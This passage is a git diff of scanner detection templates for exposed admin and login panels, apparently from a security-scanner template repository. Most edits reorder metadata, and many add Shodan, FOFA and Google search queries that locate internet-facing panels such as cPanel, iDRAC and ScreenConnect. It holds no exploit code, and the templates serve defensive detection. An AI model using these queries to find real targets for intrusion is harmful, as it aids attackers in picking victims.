2cdeac80fe..1d7e86dff6 100644 --- a/http/exposed-panels/coldfusion-administrator-login.yaml +++ b/http/exposed-panels/coldfusion-administrator-login.yaml @@ -11,9 +11,17 @@ info: cpe: cpe:2.3:a:adobe:coldfusion:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: coldfusion - shodan-query: http.title:"ColdFusion Administrator Login" vendor: adobe + product: coldfusion + shodan-query: + - http.title:"ColdFusion Administrator Login" + - http.component:"adobe coldfusion" + - http.title:"coldfusion administrator login" + - cpe:"cpe:2.3:a:adobe:coldfusion" + fofa-query: + - app="adobe-coldfusion" + - title="coldfusion administrator login" + google-query: intitle:"coldfusion administrator login" tags: panel,coldfusion,adobe http: diff --git a/http/exposed-panels/compal-panel.yaml b/http/exposed-panels/compal-panel.yaml index 342aa5b8b0..ac6443303b 100644 --- a/http/exposed-panels/compal-panel.yaml +++ b/http/exposed-panels/compal-panel.yaml @@ -11,8 +11,8 @@ info: cpe: cpe:2.3:o:compal:ch7465lg_firmware:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: ch7465lg_firmware vendor: compal + product: ch7465lg_firmware tags: panel,compal http: diff --git a/http/exposed-panels/compalex-panel-detect.yaml b/http/exposed-panels/compalex-panel-detect.yaml index f741dd8e85..6cbfc8bf64 100644 --- a/http/exposed-panels/compalex-panel-detect.yaml +++ b/http/exposed-panels/compalex-panel-detect.yaml @@ -7,10 +7,10 @@ info: reference: - http://compalex.net/ metadata: + verified: true max-request: 15 shodan-query: title:"COMPALEX" - verified: true - tags: tech,php,compalex,sql + tags: tech,php,compalex,sql,panel http: - method: GET diff --git a/http/exposed-panels/completeview-web-panel.yaml b/http/exposed-panels/completeview-web-panel.yaml index 3f4dee010d..410ae4f957 100644 --- a/http/exposed-panels/completeview-web-panel.yaml +++ b/http/exposed-panels/completeview-web-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"CompleteView Web Client" - verified: true tags: panel,completeview http: diff --git a/http/exposed-panels/concrete5/concrete5-install.yaml b/http/exposed-panels/concrete5/concrete5-install.yaml index 37dcd3d528..97aa30678f 100644 --- a/http/exposed-panels/concrete5/concrete5-install.yaml +++ b/http/exposed-panels/concrete5/concrete5-install.yaml @@ -10,11 +10,21 @@ info: classification: cpe: cpe:2.3:a:concrete5:concrete5:*:*:*:*:*:*:*:* metadata: - max-request: 2 - product: concrete5 - shodan-query: http.title:"Install concrete5" - vendor: concrete5 verified: true + max-request: 2 + vendor: concrete5 + product: concrete5 + shodan-query: + - http.title:"Install concrete5" + - cpe:"cpe:2.3:a:concrete5:concrete5" + - http.title:"install concrete5" + - http.title:"concrete5" + fofa-query: + - title="install concrete5" + - title="concrete5" + google-query: + - intitle:"concrete5" + - intitle:"install concrete5" tags: panel,install,concrete,cms,concrete5 http: diff --git a/http/exposed-panels/concrete5/concrete5-panel.yaml b/http/exposed-panels/concrete5/concrete5-panel.yaml index 0f4f85df24..96681f8cf5 100644 --- a/http/exposed-panels/concrete5/concrete5-panel.yaml +++ b/http/exposed-panels/concrete5/concrete5-panel.yaml @@ -11,9 +11,18 @@ info: cpe: cpe:2.3:a:concrete5:concrete5:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: concrete5 - shodan-query: http.title:"concrete5" vendor: concrete5 + product: concrete5 + shodan-query: + - http.title:"concrete5" + - cpe:"cpe:2.3:a:concrete5:concrete5" + - http.title:"install concrete5" + fofa-query: + - title="install concrete5" + - title="concrete5" + google-query: + - intitle:"concrete5" + - intitle:"install concrete5" tags: panel,concrete5,cms http: diff --git a/http/exposed-panels/connect-box-login.yaml b/http/exposed-panels/connect-box-login.yaml index a06eb455ff..1fdc18be74 100644 --- a/http/exposed-panels/connect-box-login.yaml +++ b/http/exposed-panels/connect-box-login.yaml @@ -10,11 +10,13 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:o:upc:connect_box_eurodocsis_firmware:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: connect_box_eurodocsis_firmware - shodan-query: NET-DK/1.0 - vendor: upc verified: true + max-request: 1 + vendor: upc + product: connect_box_eurodocsis_firmware + shodan-query: + - NET-DK/1.0 + - net-dk/1.0 tags: panel,connectbox,iot,upc http: diff --git a/http/exposed-panels/connectwise-backup-manager.yaml b/http/exposed-panels/connectwise-backup-manager.yaml index 748def1c77..f4a62d7ed8 100644 --- a/http/exposed-panels/connectwise-backup-manager.yaml +++ b/http/exposed-panels/connectwise-backup-manager.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.component:zk http.title:"Server Backup Manager" - verified: true tags: panel,connectwise,backup http: diff --git a/http/exposed-panels/connectwise-panel.yaml b/http/exposed-panels/connectwise-panel.yaml index 75feb4ba0f..ddce3e539e 100644 --- a/http/exposed-panels/connectwise-panel.yaml +++ b/http/exposed-panels/connectwise-panel.yaml @@ -9,11 +9,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:connectwise:screenconnect:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: connectwise product: screenconnect shodan-query: http.favicon.hash:-82958153 - vendor: connectwise - verified: true + fofa-query: + - app="screenconnect-remote-support-software" + - icon_hash=-82958153 + hunter-query: app.name="connectwise screenconnect software" + zoomeye-query: app:"screenconnect remote management software" tags: screenconnect,panel,connectwise,detect http: diff --git a/http/exposed-panels/contao-login-panel.yaml b/http/exposed-panels/contao-login-panel.yaml index 5a7d1ef6d3..d4bdf0992a 100644 --- a/http/exposed-panels/contao-login-panel.yaml +++ b/http/exposed-panels/contao-login-panel.yaml @@ -10,11 +10,19 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:contao:contao:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: contao - shodan-query: http.html:"Contao Open Source CMS" - vendor: contao verified: true + max-request: 1 + vendor: contao + product: contao + shodan-query: + - http.html:"Contao Open Source CMS" + - http.title:"contao" + - http.html:"contao open source cms" + - cpe:"cpe:2.3:a:contao:contao" + fofa-query: + - title="contao" + - body="contao open source cms" + google-query: intitle:"contao" tags: panel,contao http: diff --git a/http/exposed-panels/content-central-login.yaml b/http/exposed-panels/content-central-login.yaml index 4d85515401..97f57e01af 100644 --- a/http/exposed-panels/content-central-login.yaml +++ b/http/exposed-panels/content-central-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: http.title:"Content Central Login" - verified: true tags: panel,content-central http: diff --git a/http/exposed-panels/corebos-panel.yaml b/http/exposed-panels/corebos-panel.yaml index 7f18a54ba0..0618a9da35 100644 --- a/http/exposed-panels/corebos-panel.yaml +++ b/http/exposed-panels/corebos-panel.yaml @@ -10,11 +10,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:corebos:corebos:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: corebos product: corebos shodan-query: http.html:"corebos" - vendor: corebos - verified: true + fofa-query: body="corebos" tags: panel,corebos http: diff --git a/http/exposed-panels/cortex-xsoar-login.yaml b/http/exposed-panels/cortex-xsoar-login.yaml index e4d8cb7caf..5cce94feaf 100644 --- a/http/exposed-panels/cortex-xsoar-login.yaml +++ b/http/exposed-panels/cortex-xsoar-login.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:paloaltonetworks:cortex_xsoar:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: cortex_xsoar - shodan-query: http.title:"Cortex XSOAR" vendor: paloaltonetworks + product: cortex_xsoar + shodan-query: + - http.title:"Cortex XSOAR" + - http.title:"cortex xsoar" + fofa-query: title="cortex xsoar" + google-query: intitle:"cortex xsoar" tags: panel,soar,login,paloaltonetworks http: diff --git a/http/exposed-panels/couchdb-exposure.yaml b/http/exposed-panels/couchdb-exposure.yaml index 48dd5fd207..145b7e32bb 100644 --- a/http/exposed-panels/couchdb-exposure.yaml +++ b/http/exposed-panels/couchdb-exposure.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: couchdb vendor: apache + product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: panel,couchdb,apache http: diff --git a/http/exposed-panels/couchdb-fauxton.yaml b/http/exposed-panels/couchdb-fauxton.yaml index e4288cd1d3..d31a9d556c 100644 --- a/http/exposed-panels/couchdb-fauxton.yaml +++ b/http/exposed-panels/couchdb-fauxton.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:apache:couchdb:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: couchdb vendor: apache + product: couchdb + shodan-query: + - product:"couchdb" + - cpe:"cpe:2.3:a:apache:couchdb" tags: panel,apache,couchdb http: diff --git a/http/exposed-panels/cpanel-api-codes.yaml b/http/exposed-panels/cpanel-api-codes.yaml index 1cd654880a..53f2ce9e01 100644 --- a/http/exposed-panels/cpanel-api-codes.yaml +++ b/http/exposed-panels/cpanel-api-codes.yaml @@ -10,11 +10,21 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:cpanel:cpanel:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: cpanel - shodan-query: title:"CPanel - API Codes" - vendor: cpanel verified: true + max-request: 1 + vendor: cpanel + product: cpanel + shodan-query: + - title:"CPanel - API Codes" + - http.title:"cpanel" + - cpe:"cpe:2.3:a:cpanel:cpanel" + - http.title:"cpanel - api codes" + fofa-query: + - title="cpanel - api codes" + - title="cpanel" + google-query: + - intitle:"cpanel - api codes" + - intitle:"cpanel" tags: panel,cpanel http: diff --git a/http/exposed-panels/craftcms-admin-panel.yaml b/http/exposed-panels/craftcms-admin-panel.yaml index 1c26ff0ad2..cb538d70e7 100644 --- a/http/exposed-panels/craftcms-admin-panel.yaml +++ b/http/exposed-panels/craftcms-admin-panel.yaml @@ -11,9 +11,12 @@ info: cpe: cpe:2.3:a:nystudio107:seomatic:*:*:*:*:craft_cms:*:*:* metadata: max-request: 1 - product: seomatic - shodan-query: 'X-Powered-By: Craft CMS' vendor: nystudio107 + product: seomatic + shodan-query: + - 'X-Powered-By: Craft CMS' + - "x-powered-by: craft cms" + - 'x-powered-by: craft cms html:"seomatic"' tags: panel,craftcms,nystudio107 http: diff --git a/http/exposed-panels/craftercms-panel.yaml b/http/exposed-panels/craftercms-panel.yaml index 637e9b1bbe..aa0826bea7 100644 --- a/http/exposed-panels/craftercms-panel.yaml +++ b/http/exposed-panels/craftercms-panel.yaml @@ -1,19 +1,19 @@ id: craftercms-panel -info: - name: CrafterCMS Login Panel - Detect - author: righettod - severity: info - description: | - CrafterCMS login panel was detected. - reference: - - https://craftercms.org/ - metadata: - max-request: 1 - verified: true - shodan-query: http.title:"craftercms" - tags: panel,craftercms,login,detect - +info: + name: CrafterCMS Login Panel - Detect + author: righettod + severity: info + description: | + CrafterCMS login panel was detected. + reference: + - https://craftercms.org/ + metadata: + verified: true + max-request: 1 + shodan-query: http.title:"craftercms" + tags: panel,craftercms,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/creatio-login-panel.yaml b/http/exposed-panels/creatio-login-panel.yaml index 26694cc128..b5a4558643 100644 --- a/http/exposed-panels/creatio-login-panel.yaml +++ b/http/exposed-panels/creatio-login-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Creatio" - verified: true tags: panel,creatio http: diff --git a/http/exposed-panels/crontab-ui.yaml b/http/exposed-panels/crontab-ui.yaml index c03e31f35c..9cdc773ed3 100644 --- a/http/exposed-panels/crontab-ui.yaml +++ b/http/exposed-panels/crontab-ui.yaml @@ -7,9 +7,9 @@ info: reference: - https://www.facebook.com/photo/?fbid=629288492575007&set=a.467014098802448 metadata: + verified: true max-request: 1 shodan-query: html:"Crontab UI" - verified: true tags: exposure,crontab,ui,panel http: diff --git a/http/exposed-panels/crush-ftp-login.yaml b/http/exposed-panels/crush-ftp-login.yaml index 8b6ac82e14..19a6094459 100644 --- a/http/exposed-panels/crush-ftp-login.yaml +++ b/http/exposed-panels/crush-ftp-login.yaml @@ -12,10 +12,12 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: crushftp - vendor: crushftp verified: true + max-request: 1 + vendor: crushftp + product: crushftp + shodan-query: http.html:"crushftp" + fofa-query: body="crushftp" tags: panel,edb,crushftp,detect http: diff --git a/http/exposed-panels/cryptobox-panel.yaml b/http/exposed-panels/cryptobox-panel.yaml index b3670ef6da..7b4257d51a 100644 --- a/http/exposed-panels/cryptobox-panel.yaml +++ b/http/exposed-panels/cryptobox-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.ercom.com/solutions/cryptobox-presentation metadata: + verified: true max-request: 1 shodan-query: title:"Cryptobox" - verified: true tags: panel,cryptobox,login,detect http: diff --git a/http/exposed-panels/cudatel-panel.yaml b/http/exposed-panels/cudatel-panel.yaml index 5ec722251d..3cd0d80735 100644 --- a/http/exposed-panels/cudatel-panel.yaml +++ b/http/exposed-panels/cudatel-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"CudaTel" - verified: true tags: panel,cudatel http: diff --git a/http/exposed-panels/cvent-panel-detect.yaml b/http/exposed-panels/cvent-panel-detect.yaml index 835c0d561c..d2a6a7f654 100644 --- a/http/exposed-panels/cvent-panel-detect.yaml +++ b/http/exposed-panels/cvent-panel-detect.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 5 shodan-query: http.html:"Cvent Inc" - verified: true tags: panel,cvent http: diff --git a/http/exposed-panels/cwp-webpanel.yaml b/http/exposed-panels/cwp-webpanel.yaml index 1373e8751b..fd8b0f9149 100644 --- a/http/exposed-panels/cwp-webpanel.yaml +++ b/http/exposed-panels/cwp-webpanel.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title=="CWP |用户" || title=="Login | CentOS WebPanel" || body="CentOS WebPanel" max-request: 1 + fofa-query: title=="CWP |用户" || title=="Login | CentOS WebPanel" || body="CentOS WebPanel" tags: panel,centos http: diff --git a/http/exposed-panels/cyberchef-panel.yaml b/http/exposed-panels/cyberchef-panel.yaml index 16f35d626d..aa6389568e 100644 --- a/http/exposed-panels/cyberchef-panel.yaml +++ b/http/exposed-panels/cyberchef-panel.yaml @@ -1,19 +1,19 @@ id: cyberchef-panel -info: - name: Cyber Chef Panel - Detect - author: rxerium - severity: info - description: | - A Cyber Chef Panel was detected - reference: - - https://cyberchef.org - metadata: - verified: true - max-request: 1 - shodan-query: title:"CyberChef" - tags: panel,cyberchef,login,detect - +info: + name: Cyber Chef Panel - Detect + author: rxerium + severity: info + description: | + A Cyber Chef Panel was detected + reference: + - https://cyberchef.org + metadata: + verified: true + max-request: 1 + shodan-query: title:"CyberChef" + tags: panel,cyberchef,login,detect + http: - method: GET path: diff --git a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml index d96f34f7b9..4876330e44 100644 --- a/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml +++ b/http/exposed-panels/cyberoam-ssl-vpn-panel.yaml @@ -12,11 +12,16 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:h:sophos:cyberoam:*:*:*:*:*:*:*:* metadata: - google-query: intitle:"Cyberoam SSL VPN Portal" max-request: 1 - product: cyberoam - shodan-query: title:"Cyberoam SSL VPN Portal" vendor: sophos + product: cyberoam + shodan-query: + - title:"Cyberoam SSL VPN Portal" + - http.title:"cyberoam ssl vpn portal" + google-query: + - intitle:"Cyberoam SSL VPN Portal" + - intitle:"cyberoam ssl vpn portal" + fofa-query: title="cyberoam ssl vpn portal" tags: panel,cyberoam,vpn,sophos http: diff --git a/http/exposed-panels/dahua-web-panel.yaml b/http/exposed-panels/dahua-web-panel.yaml index b669d439bc..108d0a6397 100644 --- a/http/exposed-panels/dahua-web-panel.yaml +++ b/http/exposed-panels/dahua-web-panel.yaml @@ -11,9 +11,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:1653394551 - verified: true tags: edb,panel,dahua,detect http: diff --git a/http/exposed-panels/darktrace-threat-visualizer.yaml b/http/exposed-panels/darktrace-threat-visualizer.yaml index 84ddc7d128..d221e57784 100644 --- a/http/exposed-panels/darktrace-threat-visualizer.yaml +++ b/http/exposed-panels/darktrace-threat-visualizer.yaml @@ -10,11 +10,14 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:darktrace:threat_visualizer:*:*:*:*:android:*:*:* metadata: - max-request: 1 - product: threat_visualizer - shodan-query: html:"Darktrace Threat Visualizer" - vendor: darktrace verified: true + max-request: 1 + vendor: darktrace + product: threat_visualizer + shodan-query: + - html:"Darktrace Threat Visualizer" + - http.html:"darktrace threat visualizer" + fofa-query: body="darktrace threat visualizer" tags: panel,darktrace http: diff --git a/http/exposed-panels/dashy-panel.yaml b/http/exposed-panels/dashy-panel.yaml index 6c8b6850c3..5ff95c512e 100644 --- a/http/exposed-panels/dashy-panel.yaml +++ b/http/exposed-panels/dashy-panel.yaml @@ -9,11 +9,12 @@ info: classification: cpe: cpe:2.3:a:dashy:dashy:*:*:*:*:*:*:*:* metadata: + verified: true max-request: 1 + vendor: dashy product: dashy shodan-query: http.favicon.hash:-1013024216 - vendor: dashy - verified: true + fofa-query: icon_hash=-1013024216 tags: panel,dashy,detect http: diff --git a/http/exposed-panels/datadog-login.yaml b/http/exposed-panels/datadog-login.yaml index 4aded9b958..4994e02c84 100644 --- a/http/exposed-panels/datadog-login.yaml +++ b/http/exposed-panels/datadog-login.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Datadog" - verified: true tags: panel,datadog http: diff --git a/http/exposed-panels/dataease-panel.yaml b/http/exposed-panels/dataease-panel.yaml index 2f077d329d..9f3a62b7d7 100644 --- a/http/exposed-panels/dataease-panel.yaml +++ b/http/exposed-panels/dataease-panel.yaml @@ -11,11 +11,14 @@ info: classification: cpe: cpe:2.3:a:dataease:dataease:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: dataease - shodan-query: html:"Dataease" - vendor: dataease verified: true + max-request: 1 + vendor: dataease + product: dataease + shodan-query: + - html:"Dataease" + - http.html:"dataease" + fofa-query: body="dataease" tags: login,panel,dataease http: diff --git a/http/exposed-panels/dataiku-panel.yaml b/http/exposed-panels/dataiku-panel.yaml index 0da072a99d..42ae78c90a 100644 --- a/http/exposed-panels/dataiku-panel.yaml +++ b/http/exposed-panels/dataiku-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"dataiku" - verified: true tags: panel,dataiku http: diff --git a/http/exposed-panels/davantis-panel.yaml b/http/exposed-panels/davantis-panel.yaml index 6b2fa8b95e..07007b967b 100644 --- a/http/exposed-panels/davantis-panel.yaml +++ b/http/exposed-panels/davantis-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: http.title:"Davantis" - verified: true tags: panel,davantis http: diff --git a/http/exposed-panels/daybyday-panel.yaml b/http/exposed-panels/daybyday-panel.yaml index 1dcf171ee4..fee27d8a81 100644 --- a/http/exposed-panels/daybyday-panel.yaml +++ b/http/exposed-panels/daybyday-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:daybydaycrm:daybyday:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: daybyday - shodan-query: http.title:"Daybyday" vendor: daybydaycrm + product: daybyday + shodan-query: + - http.title:"Daybyday" + - http.title:"daybyday" + fofa-query: title="daybyday" + google-query: intitle:"daybyday" tags: panel,daybyday,daybydaycrm http: diff --git a/http/exposed-panels/dell-bmc-panel-detect.yaml b/http/exposed-panels/dell-bmc-panel-detect.yaml index b50e9c7850..7c556f2798 100644 --- a/http/exposed-panels/dell-bmc-panel-detect.yaml +++ b/http/exposed-panels/dell-bmc-panel-detect.yaml @@ -10,9 +10,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 1 shodan-query: title:"Dell Remote Management Controller" - verified: true tags: panel,bmc,dell,login http: diff --git a/http/exposed-panels/dell-idrac.yaml b/http/exposed-panels/dell-idrac.yaml index 5de5884a50..d7a4fc65c9 100644 --- a/http/exposed-panels/dell-idrac.yaml +++ b/http/exposed-panels/dell-idrac.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: + verified: true max-request: 2 shodan-query: html:"thisIDRACText" - verified: true tags: panel,idrac,dell,detect http: diff --git a/http/exposed-panels/dell-wyse-login.yaml b/http/exposed-panels/dell-wyse-login.yaml index 61562d6654..734aa03be1 100644 --- a/http/exposed-panels/dell-wyse-login.yaml +++ b/http/exposed-panels/dell-wyse-login.yaml @@ -13,8 +13,8 @@ info: cpe: cpe:2.3:a:dell:wyse_management_suite:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: wyse_management_suite vendor: dell + product: wyse_management_suite tags: panel,dell,login http: diff --git a/http/exposed-panels/deluge-webui-panel.yaml b/http/exposed-panels/deluge-webui-panel.yaml index 9de52a2976..37e65d3ce7 100644 --- a/http/exposed-panels/deluge-webui-panel.yaml +++ b/http/exposed-panels/deluge-webui-panel.yaml @@ -10,11 +10,15 @@ info: cwe-id: CWE-200 cpe: cpe:2.3:a:deluge-torrent:deluge:*:*:*:*:*:*:*:* metadata: - max-request: 1 - product: deluge - shodan-query: title:"Deluge WebUI" - vendor: deluge-torrent verified: true + max-request: 1 + vendor: deluge-torrent + product: deluge + shodan-query: + - title:"Deluge WebUI" + - http.title:"deluge webui" + fofa-query: title="deluge webui" + google-query: intitle:"deluge webui" tags: panel,deluge,deluge-torrent http: diff --git a/http/exposed-panels/digital-watchdog-panel.yaml b/http/exposed-panels/digital-watchdog-panel.yaml index 7818badec2..655fafc9e4 100644 --- a/http/exposed-panels/digital-watchdog-panel.yaml +++ b/http/exposed-panels/digital-watchdog-panel.yaml @@ -7,10 +7,10 @@ info: description: | Digital Watchdog panel was detected. metadata: - max-request: 1 verified: true - fofa-query: icon_hash="868509217" - shodan-query: http.favicon.hash:868509217 + max-request: 2 + shodan-query: "http.favicon.hash:868509217" + fofa-query: "icon_hash=\"868509217\"" tags: digital-watchdog,panel,detect,login,dw,spectrum http: diff --git a/http/exposed-panels/digitalrebar-login.yaml b/http/exposed-panels/digitalrebar-login.yaml index 6243172669..831d6eb3f1 100644 --- a/http/exposed-panels/digitalrebar-login.yaml +++ b/http/exposed-panels/digitalrebar-login.yaml @@ -14,8 +14,8 @@ info: cpe: cpe:2.3:a:rackn:digital_rebar:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: digital_rebar vendor: rackn + product: digital_rebar tags: rackn,digitalrebar,panel http: diff --git a/http/exposed-panels/directadmin-login-panel.yaml b/http/exposed-panels/directadmin-login-panel.yaml index e6c6ae6b56..02afd5df9a 100644 --- a/http/exposed-panels/directadmin-login-panel.yaml +++ b/http/exposed-panels/directadmin-login-panel.yaml @@ -13,9 +13,13 @@ info: cpe: cpe:2.3:a:directadmin:directadmin:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: directadmin - shodan-query: title:"DirectAdmin Login" vendor: directadmin + product: directadmin + shodan-query: + - title:"DirectAdmin Login" + - http.title:"directadmin login" + fofa-query: title="directadmin login" + google-query: intitle:"directadmin login" tags: panel,directadmin http: diff --git a/http/exposed-panels/directum-login.yaml b/http/exposed-panels/directum-login.yaml index 5768af5e60..364fb1b5e2 100644 --- a/http/exposed-panels/directum-login.yaml +++ b/http/exposed-panels/directum-login.yaml @@ -9,8 +9,8 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Directum" max-request: 1 + fofa-query: title="Directum" tags: directum,panel http: diff --git a/http/exposed-panels/discuz-panel.yaml b/http/exposed-panels/discuz-panel.yaml index 72429237ba..30af114ecb 100644 --- a/http/exposed-panels/discuz-panel.yaml +++ b/http/exposed-panels/discuz-panel.yaml @@ -5,10 +5,10 @@ info: author: ritikchaddha severity: info metadata: - fofa-query: title="Discuz!" + verified: true max-request: 1 shodan-query: title:"Discuz!" - verified: true + fofa-query: title="Discuz!" tags: panel,discuz,detect,login http: diff --git a/http/exposed-panels/django-admin-panel.yaml b/http/exposed-panels/django-admin-panel.yaml index 3d18400e9f..a3abacfa8c 100644 --- a/http/exposed-panels/django-admin-panel.yaml +++ b/http/exposed-panels/django-admin-panel.yaml @@ -11,8 +11,9 @@ info: cpe: cpe:2.3:a:djangoproject:django:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: django vendor: djangoproject + product: django + shodan-query: cpe:"cpe:2.3:a:djangoproject:django" tags: panel,django,python,djangoproject http: diff --git a/http/exposed-panels/docebo-elearning-panel.yaml b/http/exposed-panels/docebo-elearning-panel.yaml index 5454ee7885..7f36d42c2f 100644 --- a/http/exposed-panels/docebo-elearning-panel.yaml +++ b/http/exposed-panels/docebo-elearning-panel.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: CWE-200 metadata: - fofa-query: title="Docebo E-learning" - max-request: 1 verified: true + max-request: 1 + fofa-query: title="Docebo E-learning" tags: panel,docebo http: diff --git a/http/exposed-panels/dockge-panel.yaml b/http/exposed-panels/dockge-panel.yaml index 7b2c54506c..0fe258c1f2 100644 --- a/http/exposed-panels/dockge-panel.yaml +++ b/http/exposed-panels/dockge-panel.yaml @@ -10,10 +10,11 @@ info: - https://github.com/louislam/dockge - https://dockge.kuma.pet/ metadata: + verified: true max-request: 1 shodan-query: title:"Dockge" - verified: true tags: panel,dockge,login + http: - method: GET path: diff --git a/http/exposed-panels/dokuwiki-panel.yaml b/http/exposed-panels/dokuwiki-panel.yaml index 67610dfb38..941ed1211e 100644 --- a/http/exposed-panels/dokuwiki-panel.yaml +++ b/http/exposed-panels/dokuwiki-panel.yaml @@ -9,9 +9,9 @@ info: reference: - https://www.dokuwiki.org/dokuwiki metadata: + verified: true max-request: 1 shodan-query: http.html:"/dokuwiki/" - verified: true tags: panel,dokuwiki,login http: diff --git a/http/exposed-panels/doris-panel.yaml b/http/exposed-panels/doris-panel.yaml index 0d8470894c..29e2840aa9 100644 --- a/http/exposed-panels/doris-panel.yaml +++ b/http/exposed-panels/doris-panel.yaml @@ -6,9 +6,9 @@ info: severity: info description: Doris panel detection template. metadata: + verified: true max-request: 1 shodan-query: http.favicon.hash:24048806 - verified: true tags: doris,panel,login,detect http: diff --git a/http/exposed-panels/dotclear-panel.yaml b/http/exposed-panels/dotclear-panel.yaml index 587c582458..0acbb5011d 100644 --- a/http/exposed-panels/dotclear-panel.yaml +++ b/http/exposed-panels/dotclear-panel.yaml @@ -11,9 +11,13 @@ info: cpe: cpe:2.3:a:dotclear:dotclear:*:*:*:*:*:*:*:* metadata: max-request: 2 - product: dotclear - shodan-query: http.title:"Dotclear" vendor: dotclear + product: dotclear + shodan-query: + - http.title:"Dotclear" + - http.title:"dotclear" + fofa-query: title="dotclear" + google-query: intitle:"dotclear" tags: panel,dotclear http: diff --git a/http/exposed-panels/dotcms-admin-panel.yaml b/http/exposed-panels/dotcms-admin-panel.yaml index 5a42ed97af..6551823659 100644 --- a/http/exposed-panels/dotcms-admin-panel.yaml +++ b/http/exposed-panels/dotcms-admin-panel.yaml @@ -11,8 +11,11 @@ info: cpe: cpe:2.3:a:dotcms:dotcms:*:*:*:*:*:*:*:* metadata: max-request: 1 - product: dotcms vendor: dotcms + product: dotcms + shodan-query: http.title:"dotcms" + fofa-query: title="dotcms" + google-query: intitle:"dotcms" tags: panel,dotcms,cms http: diff --git a/http/exposed-panels/dplus-dashboard.yaml b/http/exposed-panels/dplus-dashboard.yaml index 132729ee36..d9097baf8c 100644 --- a/http/exposed-panels/dplus-dashboard.yaml +++ b/http/exposed-panels/dplus-dashboard.yaml @@ -9,9 +9,9 @@ info: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cwe-id: 